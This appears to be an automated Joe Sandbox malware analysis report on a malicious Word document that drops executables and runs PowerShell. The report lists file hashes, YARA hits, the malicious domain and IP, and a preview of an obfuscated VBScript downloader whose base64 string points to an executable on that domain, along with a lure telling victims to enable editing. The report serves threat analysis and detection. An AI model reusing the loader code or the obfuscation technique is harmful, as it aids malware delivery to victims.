https://secure.comodo.com/CPS0 | powershell.exe, 00000006.00000002.919745005.000000001B388000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.00000000002DA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://crl.entrust.net/2048ca.crl0 | powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp | false | | high
                  IP:149.102.154.62
                  Domain:thekaribacruisecompany.com
                  Country:United States
                  ASN:174
                  ASN Name:COGENT-174US
                  Malicious:true
                  Joe Sandbox Version:37.0.0 Beryl
                  Analysis ID:829399
                  Start date and time:2023-03-18 05:34:14 +01:00
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 11m 11s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:25
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample file name:TEPO0015922.doc
                  Detection:MAL
                  Classification:mal100.troj.expl.evad.winDOC@29/33@2/1
                  EGA Information:
                  • Successful, ratio: 75%
                  HDC Information:
                  • Successful, ratio: 75.9% (good quality ratio 74.7%)
                  • Quality average: 87.8%
                  • Quality standard deviation: 20.7%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 96
                  • Number of non-executed functions: 58
                  Cookbook Comments:
                  • Found application associated with file extension: .doc
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Found warning dialog
                  • Click Ok
                  • Attach to Office via COM
                  • Active ActiveX Object
                  • Scroll down
                  • Close Viewer
                  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
                  • Execution Graph export aborted for target powershell.exe, PID 264 because it is empty
                  • Not all processes were analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtCreateFile calls found.
                  • Report size getting too big, too many NtOpenFile calls found.
                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                  Time | Type | Description
                  05:34:20 | API Interceptor | 48x Sleep call for process: powershell.exe modified
                  05:34:27 | API Interceptor | 824x Sleep call for process: file.exe modified
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                          Category:dropped
                                                          Size (bytes):676320
                                                          Entropy (8bit):7.876330435838718
                                                          Encrypted:false
                                                          SSDEEP:12288:8mNV/R3qdeJpAQxZg2ZE0PU4vPDC+0BOh8ybWIJQ3P0tX8glVk+4uWFG49:8mNV/RadXcvZ72PGX8g0uWA49
                                                          MD5:A1AFEF77EEC567ADB1076E8679AF207B
                                                          SHA1:842A3650C51486F329A4079CA4B62AE5542A8C98
                                                          SHA-256:2219616AFA29DD45A0B8926C8D840C5168F3B9E14A14F7569EA70EA8F5ACAA79
                                                          SHA-512:8DAFDDABA28D56F80B09545068A9A292A0D6E8C21D1D8CA0395B3AA113C467C4134A1781D62D78BA541AECF519DADA47F46D39EB59BF41B3B9366A3659027253
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: SUSP_NullSoftInst_Combo_Oct20_1, Description: Detects suspicious NullSoft Installer combination with common Copyright strings, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\file[1].exe, Author: Florian Roth (Nextron Systems)
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 6%
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:Windows metafile
                                                          Category:dropped
                                                          Size (bytes):3712
                                                          Entropy (8bit):5.038804771790638
                                                          Encrypted:false
                                                          SSDEEP:48:PZk/UKHl3G6nj6rmbYf3LSrd/lO88e0f5aSdJ9nNk3t1f8:Rk7Hgwj+mbYf3LSrhlOs0f5aSdHn63DE
                                                          MD5:4D808394C1EEFE8BB33A88A06C27401A
                                                          SHA1:E7E85FAC534EB92A90047CEAA4FBA4D0BB2FB761
                                                          SHA-256:588A5724964EDC5765F224738AD5AE3FE39D8F67DF7C3990013739808663A396
                                                          SHA-512:499AA1814D8E9E4982EBE52063786EDBCB924C587045844638F2C61FEED4900A321F8C6E166A76FBEACC5AAA4ABAA8B925523DE5EF1FDD8A7C9323B7D52D517E
                                                          Malicious:false
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:370 sysV pure executable
                                                          Category:dropped
                                                          Size (bytes):262160
                                                          Entropy (8bit):0.03833554348224308
                                                          Encrypted:false
                                                          SSDEEP:12:IyQ3fvTmeCEG+b2+f3TE/lfuNH1RCZK4vFQyfulTa5Pw1ETgobVOI7lP1g6UKK4N:7e8+S+f3CsHT8v5GIw1Ew2sEr10+
                                                          MD5:8844F30E839A1EFB15EF793ADF3FAADB
                                                          SHA1:63C9886F6646A18F84551260C802A23EA5EA59C6
                                                          SHA-256:353497E0866CB4835118DF6240847822FDEBBFD6F91A54385CD8C91C923927BF
                                                          SHA-512:3F57407F8B80C80022CBF11C023C1A42C56C2B03F57F87BF342DF19D624249E1C9DB82DC52791B3C1DAEA541884935B20615645FC2976448BE123D37D231A6D4
                                                          Malicious:false
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):72192
                                                          Entropy (8bit):5.409452390606404
                                                          Encrypted:false
                                                          SSDEEP:1536:jjzaoaDabaRaOa2EV1/pfw8jzaoaDabaRaOa2EV1/pb4M:jjzaoaDabaRaOa2yhpbjzaoaDabaRaOE
                                                          MD5:19AEC7C9E1A6F87D33460B38D45598C1
                                                          SHA1:29A61AFAA40A1D73C86C2C8B8F45129FB53ADD46
                                                          SHA-256:77AE5958D01783AD2EA852528C06B3990170E2BE2CC56C4E3B6BA6DA1F794F2A
                                                          SHA-512:63011FE4D636EE50FE5549F8728CC2DF6B91325B7D42D10A1B79492C3F9FA26FA11B19EECD5A4161F168ACBA5E301A50864B85056F517D252B0CC9D3228F2EF7
                                                          Malicious:false
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):44610
                                                          Entropy (8bit):2.915845583250266
                                                          Encrypted:false
                                                          SSDEEP:768:jH/3ViFs0Dqeb4Zep84JtueJvCI19rIwzWSgUg4P58F:LFia0Dqeb0nstw29rVzWSgm58F
                                                          MD5:DD4D5630ACAED2C14DBBFEF135337A90
                                                          SHA1:F9CF009C0D71D59B8E976F3CB9FF8C58DB65C777
                                                          SHA-256:15C024ACB0117A71C3A5FA9C0D4CB47C15B1724C868340290561E242CCAACABE
                                                          SHA-512:E7D91217A34A9CCE6D829903B12FB9FD49E104418488DEB83794D0779DCCF30D723E46F4DBC7FE0BA59FFFB4BBDEAB6D3AF2E46EF26112B4BAADAEEF4E74FC98
                                                          Malicious:false
                                                          Preview:c.0.5.P.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .E.d.i.t.i.n.g. .t.o. .v.i.e.w. .t.h.e. .d.o.c.u.m.e.n.t.......=......... .P.a.c.k.a.g.e.E.M.B.E.D.W.o.r.d...D.o.c.u.m.e.n.t...8.........=....... .\.a. .W.o.r.d...D.o.c.u.m.e.n.t...8. .".%.T.M.P.%.\.\.F.Z.d.t.f.h.g.Y.g.e.g.h.D.9 ....s.c.T.". .".e.w.:.{.0.0.0.0.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.-.0.0.0.0.0.0.0.0.0.0.0.0.}.".L.I.N.K........................................................................................................................................... ...<...N...f...h...n...p...v.................................................................................................................................................................................................................................................CJ..OJ..QJ..^J..aJ.....j....OJ..QJ..U..^J..mH..sH.. .j..g...OJ..QJ..U..^J..mH..sH....OJ..QJ..^J..mH..sH.....h..N.OJ..QJ..^J.....h..N..h..N.OJ..QJ..^J.....h..N..h..N.5..OJ..QJ..^J....h..N..h..N.OJ..PJ..QJ..^J.
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1024
                                                          Entropy (8bit):0.05390218305374581
                                                          Encrypted:false
                                                          SSDEEP:3:ol3lYdn:4Wn
                                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                          Malicious:false
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1536
                                                          Entropy (8bit):1.3552060938024997
                                                          Encrypted:false
                                                          SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlby:IiiiiiiiiifdLloZQc8++lsJe1Mzx
                                                          MD5:8F34D16DF01F276F2E234FC9258B3727
                                                          SHA1:428153094C7CD2746DD5A708F5E39AFBF8662837
                                                          SHA-256:10E530C54C6FE6553CBDEC0ACA8A2E3F9D9EAC12A2A77A913DAB2061D2600550
                                                          SHA-512:48B7984A98A666C4F5243D1B7DF2017D78C73AC20F88B14E2F7CC519C329E2E4B4EAB9FFD0C20E6CDD54FB63D724C6521312D035156BAD123260646E0C8F2B66
                                                          Malicious:false
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):27285
                                                          Entropy (8bit):5.239363181413612
                                                          Encrypted:false
                                                          SSDEEP:384:fk5bxzaoaDabaRaOa2EqrRiymKviciqNEEE6oEaE3DvzLfanpob:sjzaoaDabaRaOa2EGYym1qSPW1LzOnpc
                                                          MD5:8BED1182F10668855D0EBF97E4D6AB19
                                                          SHA1:70026363421111F8B032D8BA267F1A3D6E39A9AB
                                                          SHA-256:DB605E4427B82B840EBEF2FBC01CAF768AB8557D823AFF39694E8C9532D8BAF2
                                                          SHA-512:73168037D3BF83D672511FAE9631026E73B17AD2B5E54904675C0496120FB1C16DB8D8A606A8159F718B8E58E945DEECE24A8D7F6C4B5743F7DF3BF2D8258162
                                                          Malicious:true
                                                          Preview:<scriptleT.. ><script runat="server" language = 'vbscript'>....fsdfdsfs = "aHR0UHM6Ly90aGVrYXJpYmFjcnVpc2Vjb21wYW55LmNvbS9maWxlLmV4ZQ==" 'wiiurg..yulkytjtrhtjrkdsarjky ="ZmlsZS5leGU=" 'wiiurg..Function age64Funccode(ByVal cvwtr5ycbve, ByVal trtsk484t378).. Dim xtexenc.. if trtsk484t378 Then xtexenc = "utf-16le" Else xtexenc = "utf" + "-8".. ' Use an aux. XML document with a Base64-encoded element... ' Assigning the encoded text to .Text makes the decoded byte array.. jdcuidowfubg7 = "b" + "je".. vbsxjkhwgejkdwfgkvbf = "Cr".. vbsxjkhwgejkdwfgkvbf = vbsxjkhwgejkdwfgkvbf + "eateO".. vbsxjkhwgejkdwfgkvbf = vbsxjkhwgejkdwfgkvbf + jdcuidowfubg7 + "ct".. soswjwslvc = "reate".. mosdoepfy9eqje = "Se".. vposaleusaogr = "(""Msx".. vposaleusaogr = vposaleusaogr + "ml2.".. vposaleusaogr = vposaleusaogr + "DOMDocument"")" + ".C".. mosdoepfy9eqje = mosdoepfy9eqje + "t alxmd = " + vbsxjkhwgejkdwfgkvbf + vposaleusaogr + soswjwslvc + "E".. mosdo
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:gAWY3n:qY3n
                                                          MD5:FBCCF14D504B7B2DBCB5A5BDA75BD93B
                                                          SHA1:D59FC84CDD5217C6CF74785703655F78DA6B582B
                                                          SHA-256:EACD09517CE90D34BA562171D15AC40D302F0E691B439F91BE1B6406E25F5913
                                                          SHA-512:AA1D2B1EA3C9DE3CCADB319D4E3E3276A2F27DD1A5244FE72DE2B6F94083DDDC762480482C5C2E53F803CD9E3973DDEFC68966F974E124307B5043E654443B98
                                                          Malicious:false
                                                          Preview:[ZoneTransfer]..ZoneId=3..
                                                          Process:C:\Users\user\AppData\Roaming\file.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):11776
                                                          Entropy (8bit):6.024446974480565
                                                          Encrypted:false
                                                          SSDEEP:192:Vm9rQDenC9VrcK7REgSWOprANupQYLRszDDH/d9CWlXo7U6Wxf:QJQEaVAK7R9SfpjpQYLRszfH/d9CWB1j
                                                          MD5:E23600029D1B09BDB1D422FB4E46F5A6
                                                          SHA1:5D64A2F6A257A98A689A3DB9A087A0FD5F180096
                                                          SHA-256:7342B73593B3AA1B15E3731BFB1AFD1961802A5C66343BAC9A2C737EE94F4E38
                                                          SHA-512:C971F513142633CE0E6EC6A04C754A286DA8016563DAB368C3FAC83AEF81FA3E9DF1003C4B63D00A46351A9D18EAA7AE7645CAEF172E5E1D6E29123AB864E7AC
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Joe Sandbox View:
                                                          • Filename: Royalistic.exe, Detection: malicious, Browse
                                                          • Filename: Annexationist.exe, Detection: malicious, Browse
                                                          • Filename: file.exe, Detection: malicious, Browse
                                                          • Filename: REQUEST_FOR_QUOTE.exe, Detection: malicious, Browse
                                                          • Filename: oOEAcj2CRw.exe, Detection: malicious, Browse
                                                          • Filename: P8plQXLs5a.exe, Detection: malicious, Browse
                                                          • Filename: HFFIFAnqTY.exe, Detection: malicious, Browse
                                                          • Filename: NEWORDER.EXE.exe, Detection: malicious, Browse
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./@t.k!..k!..k!..9T..l!.. Y..l!..k!..x!...T..o!...T..j!...T..j!...T..j!..Richk!..........................PE..L.....c.........."!....."...................@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...+!.......".................. ..`.rdata.......@.......&..............@..@.data...D....P.......*..............@....reloc.......`.......,..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:59 2022, mtime=Tue Mar 8 15:45:59 2022, atime=Sat Mar 18 11:34:15 2023, length=248144, window=hide
                                                          Category:dropped
                                                          Size (bytes):1019
                                                          Entropy (8bit):4.5488977700317035
                                                          Encrypted:false
                                                          SSDEEP:24:8oE3k/XT89dqPplqMNef/1+WDv3q+cX7cY:8osk/XTko7NC/a+Kl
                                                          MD5:A437967E1061678D0FF0E50870435957
                                                          SHA1:BC5F02EA09D07829F2B9C03F75C515911240F215
                                                          SHA-256:DBFCEDA42BC9CC0A58EC27B58946233256391507B83DC57643D12AFDE3F2EB6A
                                                          SHA-512:CA679DA91B7459CCFFCAF1AA47589FF7E55A6A06F8155A9E8540AC7D50C7FDDFC6CADFFA92162733816FC0A1947167F15191808CE9854ED52697D7F7A0627FFE
                                                          Malicious:false
                                                          Preview:L..................F.... .....k..3....k..3...@..Y..P............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT...Desktop.d......QK.XhT.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....h.2.P...rVHd .TEPO00~1.DOC..L......hT..hT..*...r.....'...............T.E.P.O.0.0.1.5.9.2.2...d.o.c.......y...............-...8...[............?J......C:\Users\..#...................\\061544\Users.user\Desktop\TEPO0015922.doc.&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.T.E.P.O.0.0.1.5.9.2.2...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......061544..........D_....3N...W...9I..N..... .....[D_....3N...W...9I
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:Generic INItialization configuration [doc]
                                                          Category:dropped
                                                          Size (bytes):73
                                                          Entropy (8bit):4.708249518901646
                                                          Encrypted:false
                                                          SSDEEP:3:bDuMJlpwxXpulmX1mzXpulv:bCiwRpur7pu1
                                                          MD5:171A06F44A4A1DF6E94542EC2401B637
                                                          SHA1:0CBD760BE24649A735405B819571C0FA21DD4FE3
                                                          SHA-256:E9570E3F648D804D3339EE4C51DD2E09E45213D17E5AED1A608264BE1C62AAFD
                                                          SHA-512:999E5638639B4028DBB7BFFD2901EC0D1028E96766C469F445F9CB518B3160E57ADEDDA18C42CC25AAF870FE008B289E3ECAA6B241D4F4FD503AC3B891355943
                                                          Malicious:false
                                                          Preview:[folders]..Templates.LNK=0..TEPO0015922.LNK=0..[doc]..TEPO0015922.LNK=0..
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):162
                                                          Entropy (8bit):2.503835550707525
                                                          Encrypted:false
                                                          SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
                                                          MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
                                                          SHA1:23684CCAA587C442181A92E722E15A685B2407B1
                                                          SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
                                                          SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
                                                          Malicious:false
                                                          Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):2
                                                          Entropy (8bit):1.0
                                                          Encrypted:false
                                                          SSDEEP:3:Qn:Qn
                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                          Malicious:false
                                                          Preview:..
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8016
                                                          Entropy (8bit):3.584171275091943
                                                          Encrypted:false
                                                          SSDEEP:96:chQCNAPXMqsqvsqvJCwo0z8hQCNAPXMqsqvsEHyqvJCworezsKPrYpHXyuyrBKPo:coflo0z8oftHnorezsKMd+BK+jp
                                                          MD5:8C1FC95796F285E35E3C114072F0994C
                                                          SHA1:3CAE37018D6EFC898DDB912819FAF0110D2ED9F3
                                                          SHA-256:68860048B5C059DB735F63FA816E73825F5AFBBDF89793BAB0C97A18B1192129
                                                          SHA-512:013E04827C7E278D5D1C77DCB0F469DCD7B83137EA8EC5B450DCADBFC0DD327E3E13DBD7BE6C4840D1F10916319490E6152B99A8C53669277DBEDED202DC1965
                                                          Malicious:false
                                                          Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1.....hT....Programs..f.......:..hT..*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                          Process:C:\Users\user\AppData\Roaming\file.exe
                                                          File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 8 bit, mono 11025 Hz
                                                          Category:dropped
                                                          Size (bytes):66112
                                                          Entropy (8bit):5.179999054900731
                                                          Encrypted:false
                                                          SSDEEP:1536:BXbR5BGcY3nVQkEwzmnOqF/Mkb2iqSfrlAjX6vDVp89XTnvMNa48XSdMo70BaXDM:DzbYbIc3/
                                                          MD5:25C91AD0CC8B70FCAC47A132879893EF
                                                          SHA1:6F842222085854C037FB3E83ABEF2A841CFEF932
                                                          SHA-256:C08AB0F702503A43090DF125191B8C6C84B163DF40FF077C9D5CD064E33E1B93
                                                          SHA-512:F418FB5223485C2C96AF4B286A7B11850BBF52F9DBFADA3FD9D979B60A196D53294D2225EC8860228F3A949FAA1DD61ED913341A74E1B3F60A9F7F30659B2155
                                                          Malicious:false
                                                          Preview:RIFF8...WAVEfmt .........+...+......data..............~.~...||}.........sv{...||}|{}}}..||zzyxw{.....n_nz~.|zzyxy|.....~}{|{zz......hgrz.~{yyvvy{.....yxz~}|}......oep{~}yxvvvx|~...|vw|...~}......i_jvxyxyvvvz}...~xy~....|yz.....zEXly{{yywtw|...........zvw.....{7Yo}|{{{vss{.....|.....xru~....^6`p~|xzyvrt}....|w}....zrt.....i3[n|{wx|yvt.....xv}....ztvz....a1^n.{vy.}wv.....yx|....ysw}...9Gkw.{t|.|vx.....yu~....{x{....3Sr~.{t|~{vz.....ww~....z|.....u;^v..zu|~{w}....|wy....}x.....MIiy..ww}}xx~....xvz....{z.....{AZp|.~vx}ywz....|vw.....~......`Rcv..{vvwy||....vw}.............wjo}.{opt{.....|xy|~...........}kjr|.~|}~|}|..~}..............|mkrz.~{x|~........}..........}}zxwwz{{xz~......~.}}.........z~||wvy}.~}}~.~}...............{{}zvsx}.~|}}~........}........~z|}{zy}~}|}......................~}zz}~.~...~...................}}zz|.....~}~..................~}~|~~...}}~........~..............|~~...~.}}.....................}}~....~~|~.....................~~~~..}}~|.......~..............~~...~}}.|.
                                                          Process:C:\Users\user\AppData\Roaming\file.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):297472
                                                          Entropy (8bit):5.872932743464719
                                                          Encrypted:false
                                                          SSDEEP:6144:8NBtNg2np1eFXhtBE/ByZD9Q9thDhauHiNOafnk:8NB74XhHE5yZDYDhasg
                                                          MD5:1A2D40F5C02CEEB8EB6CD94932B39130
                                                          SHA1:8C460E86ABDB90E157A5E2DB5D3D24F8D51DC516
                                                          SHA-256:8B6E649444A08D77DFD1FD646F6FCC2490EC222A2C1F8E633B08F9DC7A66458A
                                                          SHA-512:F0C9AB06B8F73087D2B2A098D73A6F246D5E2506CEF19B27A942DC40E87F542E42EDAA2D97500B9E5F430F763AA182E0F43F29A02B4C2015EDAFC2B7F90D3278
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Y...........!................n.... ........... ..............................kl....@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H...........X...................P .............................................v.{.8.e...hNi.8.?..A.....51...%.q.z...).+...S11Ko.O.R3.x.{..y.sT.|}....*....zx.0.C.]..v...g.|z.P=c.[..Qc...0.0.s.....{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*z.{........{........{.......*.*..#........#........~....~....~....(....*b...~....~....~....(....*n......~....~....~....(....*R....~....~....(....*..0..D........(......}.....~....}......}......}..
                                                          Process:C:\Users\user\AppData\Roaming\file.exe
                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):1245
                                                          Entropy (8bit):5.462849750105637
                                                          Encrypted:false
                                                          SSDEEP:24:hM0mIAvy4Wvsqs1Ra7JZRGNeHX+AYcvP2wk1RjdEF3qpMk5:lmIAq1UqsziJZ+eHX+AdP2TvpMk5
                                                          MD5:5343C1A8B203C162A3BF3870D9F50FD4
                                                          SHA1:04B5B886C20D88B57EEA6D8FF882624A4AC1E51D
                                                          SHA-256:DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
                                                          SHA-512:E0F50ACB6061744E825A4051765CEBF23E8C489B55B190739409D8A79BB08DAC8F919247A4E5F65A015EA9C57D326BBEF7EA045163915129E01F316C4958D949
                                                          Malicious:false
                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>..<title>404 - File or directory not found.</title>..<style type="text/css">.. ..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}..-->..</style>..</head>..<body>..<div id="header"><h1>Server Error</h1></div>..<div id="content">.. <div class="co
                                                          Process:C:\Users\user\AppData\Roaming\file.exe
                                                          File Type:RIFF (little-endian) data, WAVE audio, Microsoft PCM, 8 bit, mono 11025 Hz
                                                          Category:dropped
                                                          Size (bytes):80844
                                                          Entropy (8bit):6.256034406762346
                                                          Encrypted:false
                                                          SSDEEP:1536:YZJEZfE9Igi5zpy1dBpYb9CAW/NDvvhDfrQ4ZzgOlhwTMxQrvIJ7KJ6hxU/S9N2u:8GM9Tkzpy1d4b/W/JvhjrDDhwTsQrinB
                                                          MD5:C1B6BDA7931C1FE99589D7A9D0A0223E
                                                          SHA1:FA22FFD9FAE116EEEBC487B7F9DBC794FA180CBC
                                                          SHA-256:7E62946949E6982633ECF3C5A67121C6A101407E6DEB6C01D21A97344175ACC5
                                                          SHA-512:F0056CD015E7476A55A9B4F5C26D588332C1261D083762EFBAC875475ECB15E97521F2214088798D754F38D15BC080F046D10C68727BC533F6F51DA3A89BF087
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\file.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):75820
                                                          Entropy (8bit):4.595608514165927
                                                          Encrypted:false
                                                          SSDEEP:1536:6BlrBeHUW0BV7mgDoDiTEy1ZRkLuHFcWtiG:6DVUUhBIsTxuLcFcWUG
                                                          MD5:563A22B0870A170122E7E6B12B1DC71B
                                                          SHA1:978953365D04DFA73DBBDDC19C1F51F65B467F9D
                                                          SHA-256:F0800C56C7CC987302235997ACC52FBBDC90913FEED800F19C7E6986A10EC158
                                                          SHA-512:53BF553889B4F279F924DC6652D823C4A19045D0D59262D65F00C4A85D72435DEF8CF7D4BBE235E61E7F5DDDEC1E0A6CB2D2CA42AAA570FB9CAFC8E66C299379
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\file.exe
                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                          Category:dropped
                                                          Size (bytes):11546
                                                          Entropy (8bit):5.130157501525605
                                                          Encrypted:false
                                                          SSDEEP:192:55sVeiuEzHQl+HjJWIZVVJ7niRk1RMBwugS:55sVebEzHQl5IZVVMRk1QSS
                                                          MD5:E2AFC893A72C3734DF31362E0962B153
